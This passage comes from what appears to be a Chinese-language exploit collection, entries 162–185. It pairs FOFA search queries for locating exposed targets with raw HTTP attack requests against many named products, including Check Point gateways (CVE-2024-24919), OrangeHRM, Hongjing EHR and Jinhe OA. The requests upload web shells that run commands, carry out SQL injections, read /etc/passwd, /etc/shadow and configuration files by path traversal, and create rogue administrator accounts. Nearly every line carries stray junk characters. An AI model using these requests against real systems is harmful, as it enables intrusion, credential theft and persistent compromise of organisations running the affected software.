</UploadResume>
& Q# ?) l/ u: M( ?</soap:Body>9 A4 k5 y% i# @2 g
</soap:Envelope>! _+ `9 D" \# X* e
, t" ]$ U: q, ^1 V( C) `1 H1 }
# Z8 e7 }5 T' V( T1 ~2 F1 @" ohttp://x.x.x.x/dizxdell.aspx7 u& w) I# U3 c3 T
' t" Z4 |" I( ^% Q+ j% V# F" L162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
0 a* u3 @( [: R5 u4 SFOFA: app="和丰山海-数字标牌"3 x4 }; X# N7 K$ V2 H+ x# P0 j
POST /QH.aspx HTTP/1.1
! X' |* e" g4 L8 L" bHost: x.x.x.x
3 l2 t2 N. f) @7 u$ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ ~7 q; p% ?; `4 X0 P" o# |' nConnection: close( b M( ]* M- ]( }9 R, \. j) ]5 D. ?
Content-Length: 583
2 _& h8 H; z m" ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
7 F% N* k7 n) y8 E' x! G& hAccept-Encoding: gzip$ f! K! e9 u( ]" y d
. p" [! h( [# c$ u3 w8 V------WebKitFormBoundaryeegvclmyurlotuey
1 @7 Q" z7 j Q( _7 {Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
& A ~% _+ Y4 qContent-Type: application/octet-stream
/ C- c- G/ { ~+ V& i& A! |& o
7 @9 e1 @( O Q. B) `<% response.write("ujidwqfuuqjalgkvrpqy") %>* \! f6 v. h3 R# u* a. W
------WebKitFormBoundaryeegvclmyurlotuey- P1 R( R" ^4 h6 ]- U$ l% s4 F, G
Content-Disposition: form-data; name="action"7 Y# o& s) I. q* A
, N# V6 |9 g% g. R+ V0 {1 Eupload J. ~' q- Z6 ^1 B
------WebKitFormBoundaryeegvclmyurlotuey
5 E3 r- F* l @ S/ s* Q1 E. o: ~Content-Disposition: form-data; name="responderId"
3 T; x6 A8 c) S9 K4 N0 ~" r8 I( X) S3 R r- d, x. q# `8 Q
ResourceNewResponder
, X0 O/ E g/ \% [. \' o! X------WebKitFormBoundaryeegvclmyurlotuey
3 i, s8 Z$ [: q4 S2 @Content-Disposition: form-data; name="remotePath"% {% L/ v& y( R" q3 Y7 {
0 O ^* C7 X( ~; D5 ~: }9 s1 x- ?
/opt/resources6 h u6 z" V: o9 y0 m! ^$ X
------WebKitFormBoundaryeegvclmyurlotuey--
* \ _7 S ?7 S' x9 [
: [: u5 W6 O2 A& {: b' U% k: K; x/ B. W* ^2 X) a4 |
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
, d1 P |5 @3 }
+ W3 [' `& A3 y# d; Y3 ^163. 号卡极团分销管理系统 ue_serve.php 任意文件上传- A* d1 C: |* r" U1 ?# a. V) @$ w
FOFA: icon_hash="-795291075"% Y) Z2 w# J0 W/ L; Z; H* j
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.13 X H+ e! Z6 k3 f' J9 Q
Host: x.x.x.x
9 {- ~4 K* l A. ]( W: Y1 ~9 u/ A5 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
$ R2 a& p: d9 T O" u( Q% `: O" oConnection: close
- S# v. B5 h$ E4 |6 S0 h( Z: v4 dContent-Length: 293* `, m* X" I1 i, d! c T& f
Accept: */*
6 ]8 a# q0 I1 D$ v$ b5 E. ZAccept-Encoding: gzip, deflate
4 }$ T' B$ x" |8 C+ m( uAccept-Language: zh-CN,zh;q=0.9( d% U5 S' Q! g- z
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
: R5 g- @; h! H% Y3 _5 ?/ v! w! d! F G* i* P# |* w y
------iiqvnofupvhdyrcoqyuujyetjvqgocod% M1 G: z' D' P% j
Content-Disposition: form-data; name="name"9 q2 A' s5 }2 D3 ~# }5 T
5 f8 ~: V* Y% {5 u3 |1.php
6 O2 Y3 L9 F D------iiqvnofupvhdyrcoqyuujyetjvqgocod2 d% Y1 k. J# e! J G0 K" a( `- J
Content-Disposition: form-data; name="upfile"; filename="1.php"
3 D0 i8 z( a0 H4 jContent-Type: image/jpeg
9 ?8 z/ x2 \, E p" o! Q% E& `) ~1 a* \) Z6 M" X
rvjhvbhwwuooyiioxega* k: ?4 R1 P/ F! Q- ^
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
+ P6 Y/ [* E) G3 t" e0 R; Y
6 E+ `1 y+ @' { W; L' M2 @8 Z4 X2 ^, a
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传% E9 J$ \8 `2 X* F) i- X+ G$ X
FOFA: title="智慧综合管理平台登入"# {0 B+ L: M; f3 x& x% P7 X
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
6 e( t2 P' i- x( _8 CHost: x.x.x.x
& h7 U. E+ E' b& g4 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0$ i( J: z. [* u( v
Content-Length: 288
: P. z9 Y% M- i6 `% v& yAccept: application/json, text/javascript, */*; q=0.01' t* ?& R9 S' W# O2 P8 S4 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,3 f& V! ~( _' S4 Q' `9 s5 @) T1 x
Connection: close
\9 g" G* P$ f* D- UContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl# |" \& c6 v* _4 d. ^& O
X-Requested-With: XMLHttpRequest8 Q& C2 M# g8 h1 X! R- X5 }, H
Accept-Encoding: gzip
; h6 E" S# i7 H' |# W, s/ T& E' J, {2 \1 m" B. D
------dqdaieopnozbkapjacdbdthlvtlyl) [# M0 W/ Z' `- `: i
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ H! P/ O( t8 q2 c" r, u4 }
Content-Type: image/jpeg
4 M. R, e% A J {: S1 c5 u% h+ p, a6 t4 o
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
6 n' @; n0 R4 Y, D; t------dqdaieopnozbkapjacdbdthlvtlyl--
: w! o9 x* c: ]- j- J" X' }( t; g9 S# Z% m
# U" |% t# V+ X3 D7 A5 J2 W; \
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx" D7 e/ ^ ]7 v/ J& t$ O' @
( X$ u4 T: l1 i3 i; x) g7 t
165. OrangeHRM 3.3.3 SQL 注入; e" P/ G+ y8 w4 S
CVE-2024-36428/ F O# ~ |8 g1 w
FOFA: app="OrangeHRM-产品"
5 `2 Q7 R7 i S N! _URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))8 U# Y9 _$ P3 C: C' F
- L' q0 j4 y& t
" d1 L0 z; `9 c0 f, U' U' \7 W. T
166. 中成科信票务管理平台SeatMapHandler SQL注入+ m9 z) n7 I; A6 i" l' v
FOFA:body="技术支持:北京中成科信科技发展有限公司"
" b6 r$ @% r3 i8 k3 ?POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1* ~& G/ G5 ?6 \5 w) u+ G
Host:5 K8 ^0 B4 b+ _2 b2 b
Pragma: no-cache+ i4 K6 w( a% h# \ c/ O2 ^ V, I
Cache-Control: no-cache: `# ~) J2 G' Z$ K1 ]2 X
Upgrade-Insecure-Requests: 1
/ R& }2 q. P5 b! X$ }7 W; n4 Y* dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
1 m/ z& g* \. F1 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* l4 Z, q; w2 ~/ EAccept-Encoding: gzip, deflate
5 |- U0 W0 s; `( c! uAccept-Language: zh-CN,zh;q=0.9,en;q=0.85 o$ Y/ n' E* w. D
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE% V& S6 o: p" U8 [' G" r& n
Connection: close
1 }* o0 {$ Z6 x6 J4 P- WContent-Type: application/x-www-form-urlencoded3 b- P; @$ K; J" f! l
Content-Length: 89& @& H* F' n: [5 P
: g F* _7 f, Y
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE! k. M |5 |; ]
" u' I( u; ~ K4 h
5 J' j2 ^* Q1 b; w9 A167. 精益价值管理系统 DownLoad.aspx任意文件读取
- @( U% M2 V+ ?+ OFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
, m5 i/ }# Z0 Q9 D, B- \GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.19 M! F) ?. ~# {
Host:
0 y+ _3 H- N# UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% W1 G W5 D$ H/ D. W h0 `3 d
Content-Type: application/x-www-form-urlencoded8 h& H# x. G& T8 O& o* ~0 r; f- M5 \
Accept-Encoding: gzip, deflate
. ~+ g F' Y( l; J ]Accept: */*$ k' o6 x. M/ A E) @" e9 X3 j
Connection: keep-alive+ L. A1 ^" a- x, C' K4 @
9 _% x6 ]: D/ A1 R$ x
5 n5 W& [3 S7 z4 h8 O Y4 _168. 宏景EHR OutputCode 任意文件读取
" ?+ K8 M4 I' Z0 C1 KFOFA:app="HJSOFT-HCM"$ p; h! F/ U1 P W
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1+ f/ z p- K1 ?" Q
Host: your-ip& \/ u" p8 P* O' e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
0 X/ K8 j5 s! h5 g4 W EContent-Type: application/x-www-form-urlencoded
) z; T9 j6 f6 n4 fConnection: close& S- x8 }( q& K; `: A
% a* c6 Y4 L% d: h' `8 u/ a/ v
7 S6 {5 e3 v- y5 h, E" G, `% D; L9 Y6 o
169. 宏景EHR downlawbase SQL注入
" \: T6 o" b) O/ Y& xFOFA:app="HJSOFT-HCM"! ^8 X0 j; ?6 i3 X
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1$ F6 S" |" T0 k# D) F6 X
Host: your-ip7 E3 F9 E0 ?2 m% D6 K ?$ g8 i- j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- G3 A! T! X2 L2 W# S+ m
Accept: */*' a( o& c+ @- Y' Z+ x- {
Accept-Encoding: gzip, deflate
- `( l+ M8 z/ vConnection: close
/ f1 M& L" C, A# t4 \% A6 ?, g4 n$ w' Z+ h* p! Y- p9 y
* S( X G; W+ V; `0 t D& l
5 k% k, f `% G' y* p) W7 \. h170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ K7 O* T% ^2 h3 r4 v/ `
FOFA:body="/general/sys/hjaxmanage.js"
; m2 |9 D) H% I6 Q; ^POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1! `* T# |- `4 Y' {: s; h
Host: balalanengliang
- T- t. x6 u2 a- lUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& c7 Z3 s$ N# Z1 a
Content-Type: application/x-www-form-urlencoded! K% \ ~/ {" x+ R, o+ c% {- A
5 \( O9 C1 c5 {: j N
filename=../webapps/ROOT/WEB-INF/web.xml) G5 C7 o M: i
B/ {6 |2 m/ B+ g
8 i2 w- U( [; z171. 通天星CMSV6车载定位监控平台 SQL注入0 F% c6 N8 G, q; |
FOFA:body="/808gps/"
9 r5 I$ d2 Q, h* L; e: ~2 ]0 mGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
K! y+ h5 y \Host: your-ip, s; }* I3 b) w5 G% d6 d1 s! L5 d U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 n. W4 W; M2 K6 \& x
Accept: */*9 Q- N; _) E" O7 a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 m4 @% H6 x5 ]; f" z' o" r9 r: VAccept-Encoding: gzip, deflate
; N# \3 F- L( N/ dConnection: close3 ~) r2 M. j& i/ e. B3 C- [
9 \& X6 x7 A8 D. R# k+ H
v6 K- C- n& q% b0 h
! y; Z8 F5 F, I# H172. DT-高清车牌识别摄像机任意文件读取# J$ S4 W6 \$ e- ~
FOFA:app="DT-高清车牌识别摄像机"
$ \9 }2 e1 c. P% J. H0 v0 c7 kGET /../../../../etc/passwd HTTP/1.18 C* c: {+ J3 I+ T, B
Host: your-ip: D. L% o% W7 g& G: U7 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 S/ P7 a4 Y/ q2 D, w
Accept-Encoding: gzip, deflate
' [3 g* ]+ q$ u5 BAccept: */*
8 ]) Y7 W5 L' s# vConnection: keep-alive
* I8 y6 k8 R- `4 M( j' n& N3 p& d# ^1 o' a! t
9 c& h6 _- Y! `
8 |8 G9 @/ y( D$ a- U2 s: [
173. Check Point 安全网关任意文件读取
5 M7 E9 `" ^& u" CCVE-2024-24919+ r9 x0 R- S1 F1 }! J1 X# Q
FOFA:app="Check_Point-SSL-Network-Extender": X6 U! G4 G, f* X U" {! ~3 N
POST /clients/MyCRL HTTP/1.1
& c+ N- h3 Y' \( q+ Y4 u3 LHost: your-ip) V) b; q4 k$ K& I$ I5 O% J
Content-Type: application/x-www-form-urlencoded
+ N7 R1 R9 T/ C; W3 O
! b7 t3 W% B# {+ m6 saCSHELL/../../../../../../../etc/shadow
. g, g! T2 {/ [
: |1 z4 g$ j) }6 ?, V5 S
3 t% n& c7 X; a+ M# z# e
5 w X% Q6 z+ T1 v2 u# D174. 金和OA C6 FileDownLoad.aspx 任意文件读取/ D9 A; }) T0 B0 C* v, ]4 h
FOFA:app="金和网络-金和OA"
$ |5 x! j6 l$ i; C2 S+ L zGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
9 b; w# \2 O) a/ {Host: your-ip
! O s8 P0 p' a+ ] L2 M+ O3 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 i0 C- T: x% C$ @2 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ H* \. `9 E8 H5 g8 y2 ^( C) ?
Accept-Encoding: gzip, deflate, br' o- m1 u9 g; {8 R0 ?# g
Accept-Language: zh-CN,zh;q=0.9; p5 C* W9 N. f# t( j; R: \
Connection: close2 `0 C- G2 n% L/ w
3 ^( i7 @$ i: ^! v, C9 ^7 `' h
5 K( J6 Q$ P' B/ u# X. X& X
3 O& j, Y4 c+ Q6 S, W% y
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# ~2 t q1 X% N# R8 b. v KFOFA:app="金和网络-金和OA"& ?- j; f" O o0 H3 ^
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1# I2 E' s( ~1 D: x1 z
Host:) m. ^1 o$ ~1 R+ c) S( o$ g; a
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 P3 l7 D5 Y, A B, B$ T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ k" y8 T) d# J8 ~1 ]9 | z. b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 p0 M8 R# p- f4 n* `0 e0 r
Accept-Encoding: gzip, deflate
6 I$ G( m1 P7 I! E" D6 sConnection: close/ b9 o0 D1 C; Z9 z0 O5 p' z
Upgrade-Insecure-Requests: 1
# r. m8 V$ H2 E4 T# v+ a5 y/ g9 U9 I( d4 l) H6 D1 |8 }
( {7 s5 G4 [- r+ \
176. 电信网关配置管理系统 rewrite.php 文件上传6 d: \4 i! E7 }- d
FOFA:body="img/login_bg3.png" && body="系统登录"
$ X1 M. s2 R3 c* `( }8 KPOST /manager/teletext/material/rewrite.php HTTP/1.1
7 u9 k; K# X( [9 YHost: your-ip
4 E+ B) r( x$ N; G/ BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) |: Z, ]& ^+ M, M4 b" mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
8 s1 A7 o t+ e% r5 ^( {2 P7 C$ a" SConnection: close
9 @& y" }3 |$ {. h8 M
( x8 K8 D7 }& q1 U------WebKitFormBoundaryOKldnDPT
9 i: u2 S1 J8 k c* |+ [* y/ OContent-Disposition: form-data; name="tmp_name"; filename="test.php"
0 F( b8 ]6 F6 G9 b9 M# b( KContent-Type: image/png3 J' X7 l& l( S& E; @. H) O; r4 f
! G6 [* K7 ?2 c
<?php system("cat /etc/passwd");unlink(__FILE__);?>
8 ^* [1 v" E1 a1 C! [------WebKitFormBoundaryOKldnDPT
/ F' J* L4 d2 V- ~7 t4 L7 rContent-Disposition: form-data; name="uploadtime"
1 }* w# f& w( f& A9 m
9 C/ P, |& v4 i [7 b: g! J2 B9 S
------WebKitFormBoundaryOKldnDPT--( @( R1 Q$ P0 [; G+ }
3 g* {5 x+ c; u( a9 o$ O$ Y, t+ \0 G6 m) i6 o' d
( i8 ]6 r5 g7 u1 }% x9 i- x
177. H3C路由器敏感信息泄露, \% ^ s$ U$ r$ A9 S+ Q
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg4 T$ |% p+ Y' Z9 K: j2 O
/userLogin.asp/../actionpolicy_status/../M60.cfg# L' U& S2 o/ f c
/userLogin.asp/../actionpolicy_status/../GR8300.cfg0 ^3 E1 h f5 v" I" Q$ U
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
+ M! v' k# B! y# H }7 ~( }/ K" j/userLogin.asp/../actionpolicy_status/../GR3200.cfg5 {1 ? `6 X5 A# G+ Y
/userLogin.asp/../actionpolicy_status/../GR2200.cfg7 o$ v, `) X# ?, N/ Q
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
% _# i7 P ?9 c0 z; M+ v/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
8 ?9 ^: P3 o0 A7 B$ `& l/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg; H' c: s# y3 C. O3 _
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" s5 U0 G* Y7 q ]
/userLogin.asp/../actionpolicy_status/../ER5200.cfg/ k) `% s9 [! D% U; \8 r K
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
- j* k/ A2 j/ v2 j d; g/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg+ n# ?( ?3 `5 B& Z
/userLogin.asp/../actionpolicy_status/../ER3260.cfg* S" ?6 t: ?$ o# _( c9 Z6 i' p5 z
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
6 y; K7 f0 }: D/userLogin.asp/../actionpolicy_status/../ER3200.cfg( A U; A( N4 F
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg$ l' R2 y0 h8 X) j Z* ?
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
* N& Q, n- ?8 i/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
; P* @) m8 s6 i, \' k! N5 t. C/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 `& I( F3 ~; `0 e8 M8 E3 q
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg4 B% h6 {+ S. @8 N2 C s
5 k5 \4 o4 |5 e- G' P. v+ L' E
$ o- y9 F/ ~9 C
178. H3C校园网自助服务系统-flexfileupload-任意文件上传! _1 t$ b9 _7 Q. s ?3 W
FOFA:header="/selfservice"
, h( p: O7 W5 l: p8 p7 MPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
3 }, }$ P8 ]# c$ X9 a' _; cHost:; V: U& o7 _& f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# T2 h$ A/ G1 g% G! mContent-Length: 252, @+ m. ]$ u3 ~
Accept-Encoding: gzip, deflate4 V& k& l+ {, d
Connection: close( I$ n- i4 p( ?7 p- v
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
% P! H/ U4 n4 w2 w. O8 l-----------------aqutkea7vvanpqy3rh2l
% ~( ~& _% u6 ?$ i) Y r, XContent-Disposition: form-data; name="12234.txt"; filename="12234"' W4 N4 h/ _7 v5 V; C C
Content-Type: application/octet-stream1 }5 g" h# X" @2 S+ [0 c4 f
Content-Length: 255: W* }- @# ? w' |9 ]( l* A% F
0 B; a7 x& D5 z12234
6 \7 u7 l* ?# B1 z9 _9 L/ ~-----------------aqutkea7vvanpqy3rh2l--3 U9 u/ j; n% W& n) \& i
* m+ I% k6 l0 w. q, x
( }, S; V6 ]( u4 gGET /imc/primepush/%2e%2e/flex/12234.txt
% b$ Z0 k( u4 ~/ F' ~2 G6 i* o6 k0 ~" p
: ]9 {2 x+ W1 G179. 建文工程管理系统存在任意文件读取% P) O ^, s$ d" d5 P. D0 X C: n0 ?
POST /Common/DownLoad2.aspx HTTP/1.1 ?0 O9 e9 a2 c, ?- H+ S [
Host: {{Hostname}}
d+ _; v; z8 V/ tContent-Type: application/x-www-form-urlencoded$ ^5 j f# P2 X/ w6 l
User-Agent: Mozilla/5.0
; j! e/ c# v( N1 f9 G
( A$ S6 @* v3 k6 O3 V! S- d3 rpath=../log4net.config&Name=
8 [# b- w, i+ _3 a$ l
( v) Y# z2 W1 T, v, w$ m J
! O. R4 Y* }" A" T! @0 R180. 帮管客 CRM jiliyu SQL注入
5 @, o) b: D0 _: gFOFA:app="帮管客-CRM"
4 H# x( h. T6 q/ o' EGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1# I- d$ c2 V' j/ f5 F5 g; R
Host: your-ip
1 g4 ]0 t4 k; K IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 L! Z1 ?* J, |# Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. T7 }1 j- n+ M& x9 F7 O: X0 Z
Accept-Encoding: gzip, deflate
8 G$ R' _& ]4 g" D( X' LAccept-Language: zh-CN,zh;q=0.98 n) u) R' r& o7 S& i6 P9 R
Connection: close
, c/ g) J7 O! l6 w$ S' s L1 n/ s$ `6 V7 W( ]0 j
; [ h' t( I5 a" ~& P8 P
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
+ B t0 n& M' l1 T) ~) w! DFOFA:"PDCA/js/_publicCom.js"
. G5 {. G8 _4 {7 }3 qPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
, n* j3 h2 o# `' _. L7 zHost: your-ip
( s. @* Q5 r" k0 f" M1 j8 m, r3 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 v5 R8 w1 q4 |$ X0 z" D, eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# R, b/ {$ u7 [1 t5 u. NAccept-Encoding: gzip, deflate, br. N8 _. n3 {# J
Accept-Language: zh-CN,zh;q=0.9. P4 V7 F: f3 @) B; U$ c- i% M
Connection: close$ X: s2 H) s6 C/ j% q
Content-Type: application/x-www-form-urlencoded. t" q1 x& z1 Z# Z! k# a& A
' d4 F3 T9 Q. C7 u+ s* P0 c, b1 M& }
6 t6 k, f5 D$ f: X8 W9 ?) J
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
6 x$ O# G3 {. T
3 D j8 g Q1 F! X' i
) Q& Z+ j# l- O0 f. b182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
5 I P, X7 H, x' H8 g. Y7 M kFOFA:"PDCA/js/_publicCom.js"4 Z" r ?( M9 U& W6 E
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
% k5 Q" t* t. S! x3 ^/ n7 JHost: your-ip3 U9 S3 \ H0 f I) L& ?6 w% H+ m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36; o. N- V1 T2 l+ I8 q2 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 I" }. v2 S* t; G# h5 u4 fAccept-Encoding: gzip, deflate, br
, e0 \1 }) B* B. [ v# ^. ~Accept-Language: zh-CN,zh;q=0.9% }# O) f7 @; M7 j0 b
Connection: close
u8 ~# q H2 @5 Z$ |. Y- OContent-Type: application/x-www-form-urlencoded. A D+ M: U5 x$ A5 G
' t3 ~9 j- O+ g
( u4 @7 l/ ], x8 s, uusername=test1234&pwd=test1234&savedays=1" z! w! M. W6 ^2 k
4 U" G( r/ ]- v) ?! ^! C) a
& T) {) n0 V* `. [! X: G x% X! i; k
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
* X% y* L; }8 {, e% ZFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
; Y* ?9 d5 D. VGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
! D; n/ c. ~, B1 a+ j5 |$ k1 eHost: your-ip' w3 L; d* p. f# V; W7 [- t
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
! y7 Q6 S% C3 hAccept-Charset: utf-8
$ N$ g G- B( o2 X M: o9 M% y4 |Accept-Encoding: gzip, deflate, f4 [# Y' ^; w5 F
Connection: close9 Z( M* f5 y3 a8 C
B5 E c, ` j; @" B8 n0 C/ c7 n& e7 W; W' c5 Q, M2 v1 z( G
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
* W* t; m0 S* ^0 X5 k( V. ^. ~FOFA:server="SunFull-Webs"2 x" @4 U8 k4 ~
POST /soap/AddUser HTTP/1.1: A0 a3 j8 _3 Z
Host: your-ip( i! z$ \) ]' Q: k! x% R3 z" s
Accept-Encoding: gzip, deflate# R, Z3 P9 s! ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
/ [$ C- J7 V& E, g+ oAccept: application/xml, text/xml, */*; q=0.01
+ x9 C! o$ Z! M; W' {# ZContent-Type: text/xml; charset=utf-8
0 J9 M" a9 A% z! @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! v }* o% ]6 r" ?6 D9 @# ZX-Requested-With: XMLHttpRequest+ v& R5 ^ b5 c
' f! d9 `2 z; \- w/ K) G0 ~# T0 K
0 b- t; \* ~1 O+ T6 @
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')0 b. r# Q( s4 N. B& o0 A& v
& ? C; X( H; ]( Z
! C G6 O: T5 l- x8 k. I& g2 ~% v6 }
185. 瑞友天翼应用虚拟化系统SQL注入
' |" d# y0 ]: U- Uversion < 7.0.5.1
$ h$ B0 r% F6 L: G; b! D9 qFOFA:app="REALOR-天翼应用虚拟化系统"/ f. L( X( S0 A6 l% Z
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
